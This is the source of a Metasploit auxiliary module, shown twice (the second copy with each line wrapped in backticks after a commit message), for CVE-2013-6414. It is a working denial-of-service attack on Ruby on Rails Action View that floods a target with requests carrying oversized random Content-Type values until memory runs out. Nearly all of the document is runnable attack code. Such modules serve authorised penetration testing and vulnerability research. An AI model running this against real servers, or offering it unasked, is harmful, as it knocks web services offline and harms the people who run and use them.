metasploit-framework/modules/auxiliary/dos/http/rails_action_view.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
      'Description'    => %q{
        This module exploits a Denial of Service (DoS) condition in the handling of MIME caching
        of Action View. By sending a specially crafted content-type header to a rails application,
        it is possible for it to store the invalid MIME type, and may eventually consumes all
        memory if enough invalid MIMEs are given.

        Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
      },
      'Author'         =>
        [
          'Toby Hsieh', # Reported the issue
          'joev',       # Metasploit
          'sinn3r'      # Metasploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-6414' ],
          [ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
          [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
        ],
      'DisclosureDate' => 'Dec 04 2013'))

    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 20000]),
        OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
      ],
    self.class)
  end

  def host
      host = datastore['RHOST']
      host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
      host
  end

  def long_string
    Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
  end

  def http_request
    http = ''
    http << "GET / HTTP/1.1\r\n"
    http << "Host: #{host}\r\n"
    http << "Content-Type: application/#{long_string}\r\n"
    http << "\r\n"

    http
  end

  def run
    payload = http_request
    begin
      print_status("Stressing the target memory, this will take a lot of time...")
      connect
      datastore['RLIMIT'].times { sock.put(payload) }
      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Unable to connect to #{host}.")
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
    ensure
      disconnect
    end
  end
end
Add CVE-2013-6414 Rails Action View DoS 2013-12-04 20:57:30 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`


			`require 'msf/core'`


			`class Metasploit3 < Msf::Auxiliary`
			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Auxiliary::Dos`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Ruby-on-Rails Action View MIME Memory Exhaustion',`
			`'Description' => %q{`
			`This module exploits a Denial of Service (DoS) condition in the handling of MIME caching`
			`of Action View. By sending a specially crafted content-type header to a rails application,`
			`it is possible for it to store the invalid MIME type, and may eventually consumes all`
			`memory if enough invalid MIMEs are given.`

			`Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.`
			`},`
			`'Author' =>`
			`[`
			`'Toby Hsieh', # Reported the issue`
			`'joev', # Metasploit`
			`'sinn3r' # Metasploit`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2013-6414' ],`
			`[ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],`
			`[ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]`
			`],`
			`'DisclosureDate' => 'Dec 04 2013'))`

			`register_options(`
			`[`
			`Opt::RPORT(80),`
			`OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 20000]),`
			`OptInt.new('RLIMIT', [true, "Number of requests to send", 100000])`
			`],`
			`self.class)`
			`end`

			`def host`
			`host = datastore['RHOST']`
			`host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80`
			`host`
			`end`

			`def long_string`
			`Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])`
			`end`

			`def http_request`
			`http = ''`
			`http << "GET / HTTP/1.1\r\n"`
			`http << "Host: #{host}\r\n"`
			`http << "Content-Type: application/#{long_string}\r\n"`
			`http << "\r\n"`

			`http`
			`end`

			`def run`
			`payload = http_request`
			`begin`
			`print_status("Stressing the target memory, this will take a lot of time...")`
			`connect`
			`datastore['RLIMIT'].times { sock.put(payload) }`
			`print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")`
			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`print_status("Unable to connect to #{host}.")`
			`rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error`
			`print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")`
			`ensure`
			`disconnect`
			`end`
			`end`
			`end`